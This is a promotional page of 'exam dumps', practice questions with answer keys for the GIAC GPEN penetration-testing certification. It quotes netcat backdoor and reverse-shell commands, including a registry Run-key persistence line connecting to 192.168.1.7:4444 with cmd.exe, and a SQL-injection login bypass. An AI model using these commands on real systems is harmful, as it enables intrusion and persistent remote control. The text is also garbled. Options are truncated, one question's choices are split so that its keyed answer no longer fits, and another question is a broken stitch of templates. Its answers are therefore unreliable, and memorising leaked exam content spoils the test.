★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions
Free Instant Download NEW GPEN Exam Dumps (PDF & VCE):
Available on:
https://www.certleader.com/GPEN-dumps.html
Act now and download your GIAC GPEN test today! Do not waste time for the worthless GIAC GPEN tutorials. Download Up to the immediate present GIAC GIAC Certified Penetration Tester exam with real questions and answers and begin to learn GIAC GPEN with a classic professional.
Also have GPEN free dumps questions for you:
NEW QUESTION 1
Which of the following are the countermeasures against WEP cracking? Each correct answer represents a part of the solution. Choose all that apply.
- A. Using a 16 bit SSI
- B. Changing keys ofte
- C. Using the longest key supported by hardwar
- D. Using a non-obvious ke
Answer: BCD
NEW QUESTION 2
Which of the following statements are true about NTLMv1?
Each correct answer represents a complete solution. Choose all that apply.
- A. It uses the LANMAN hash of the user's passwor
- B. It is mostly used when no Active Directory domain exist
- C. It is a challenge-response authentication protoco
- D. It uses the MD5 hash of the user's passwor
Answer: ABC
NEW QUESTION 3
Which of the following nmap switches is used to perform ICMP netmask scanning?
- A. -PM
- B. -PB
- C. -PI
- D. -PS
Answer: A
NEW QUESTION 4
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site. The We-are-secure login page is vulnerable to a __________.
- A. Replay attack
- B. Land attack
- C. SQL injection attack
- D. Dictionary attack
Answer: C
NEW QUESTION 5
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.we-are-secure.com. He has to ping 500 computers to find out whether these computers are connected to the server or not. Which of the following will he use to ping these computers?
- A. PING
- B. TRACEROUTE
- C. Ping sweeping
- D. NETSTAT
Answer: C
NEW QUESTION 6
While reviewing traffic from a tcpdump capture, you notice the following commands being sent from a remote system to one of your web servers:
C:\>sc winternet.host.com create ncservicebinpath- "c:\tools\ncexe -I -p 2222 -e cmd.exe"
C:\>sc vJnternet.host.com query ncservice.
What is the intent of the commands?
- A. The first command creates a backdoor shell as a servic
- B. It is being started on TCP2222 using cmd.ex
- C. The second command verifies the service is created and itsstatu
- D. The first command creates a backdoor shell as a servic
- E. It is being started on UDP2222 using cmd.ex
- F. The second command verifies the service is created and itsstatu
- G. This creates a service called ncservice which is linked to the cmd.exe command andits designed to stop any instance of nc.exe being ru
- H. The second command verifiesthe service is created and its statu
- I. The first command verifies the service is created and its statu
- J. The secondcommand creates a backdoor shell as a servic
- K. It is being started on TCP 2222connected to cmd.ex
Answer: C
NEW QUESTION 7
Which of the following techniques are NOT used to perform active OS fingerprinting?
Each correct answer represents a complete solution. Choose all that apply.
- A. Analyzing email headers
- B. Sniffing and analyzing packets
- C. ICMP error message quoting
- D. Sending FIN packets to open ports on the remote system
Answer: AB
NEW QUESTION 8
John works as a Professional Ethical Hacker for we-are-secure Inc. The company is using a Wireless network. John has been assigned the work to check the security of WLAN of we-aresecure.
For this, he tries to capture the traffic, however, he does not find a good traffic to analyze data. He has already discovered the network using the ettercap tool. Which of the following tools can he use to generate traffic so that he can crack the Wep keys and enter into the network?
- A. ICMP ping flood tool
- B. Kismet
- C. Netstumbler
- D. AirSnort
Answer: A
NEW QUESTION 9
You successfully compromise a target system's web application using blind command injection. The command you injected is ping-n 1 192.168.1.200. Assuming your machine is
Solution:
Does this meet the goal?
- A. Yes
- B. Not Mastered
Answer: A
NEW QUESTION 10
You suspect that a firewall or IPS exists between you and the target machine. Which nmap option will elicit responses from some firewalls and IPSs while being silently dropped by the target, thus confirming the existence of a firewall or IPS?
- A. –Traceroute
- B. –Firewalk
- C. –Badsum
- D. --SF
Answer: B
NEW QUESTION 11
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t
REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
- A. You want to put Netcat in the stealth mod
- B. You want to add the Netcat command to the Windows registr
- C. You want to perform banner grabbin
- D. You want to set the Netcat to execute command any tim
Answer: ABD
NEW QUESTION 12
You are using the dsniff tool to intercept communications between two entities and establish credentials with both sides of the connections. These entities do not notice that you were retrieving the information between these two. Which of the following attacks are you performing?
- A. Man-in-the-middle
- B. ARP poisoning
- C. Session hijacking
- D. DoS
Answer: A
NEW QUESTION 13
You suspect that system administrators In one part of the target organization are turning off their systems during the times when penetration tests are scheduled, what feature could you add to the ' Rules of engagement' that could help your team test that part of the target organization?
- A. Un announced test
- B. Tell response personnel the exact lime the test will occur
- C. Test systems after normal business hours
- D. Limit tests to business hours
Answer: C
NEW QUESTION 14
You want to retrieve password files (stored in the Web server's index directory) from various Web sites. Which of the following tools can you use to accomplish the task?
- A. Sam spade
- B. Nmap
- C. Whois
- D. Google
Answer: D
NEW QUESTION 15
Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario?
- A. Adam is using NTFS file syste
- B. Alternate Data Streams is a feature of Linux operating syste
- C. Adam is using FAT file syste
- D. Adam's system runs on Microsoft Windows 98 operating syste
Answer: A
NEW QUESTION 16
Which of the following is a tool for SSH and SSL MITM attacks?
- A. Ettercap
- B. Cain
- C. Dsniff
- D. AirJack
Answer: C
NEW QUESTION 17
What happens when you scan a broadcast IP address of a network?
Each correct answer represents a complete solution. Choose all that apply.
- A. It leads to scanning of all the IP addresses on that subnet at the same tim
- B. It will show an error in the scanning proces
- C. It may show smurf DoS attack in the network IDS of the victi
- D. Scanning of the broadcast IP address cannot be performe
Answer: AC
NEW QUESTION 18
You have been contracted to penetration test an e-mail server for a client that wants to know for sure if the sendmail service is vulnerable to any known attacks. You have permission to run any type of test, how will you proceed to give the client the most valid answer?
- A. Run all known sendmail exploits against the server and see if you can compromisethe service, even if it crashed the machine or service
- B. Run a banner grabbing vulnerability checker to determine the sendmail version andpatch level, then look up and report all the vulnerabilities that exist for that versionand patch level
- C. Run all sendmail exploits that will not crash the server and see if you cancompromise the service
- D. Log into the e-mail and determine the sendmail version and patch level, then lookup and report all the vulnerabilities that exist for that version and patch level
Answer: C
NEW QUESTION 19
......
P.S. Easily pass GPEN Exam with 385 Q&As Certleader Dumps & pdf Version, Welcome to Download the Newest Certleader GPEN Dumps: https://www.certleader.com/GPEN-dumps.html (385 New Questions)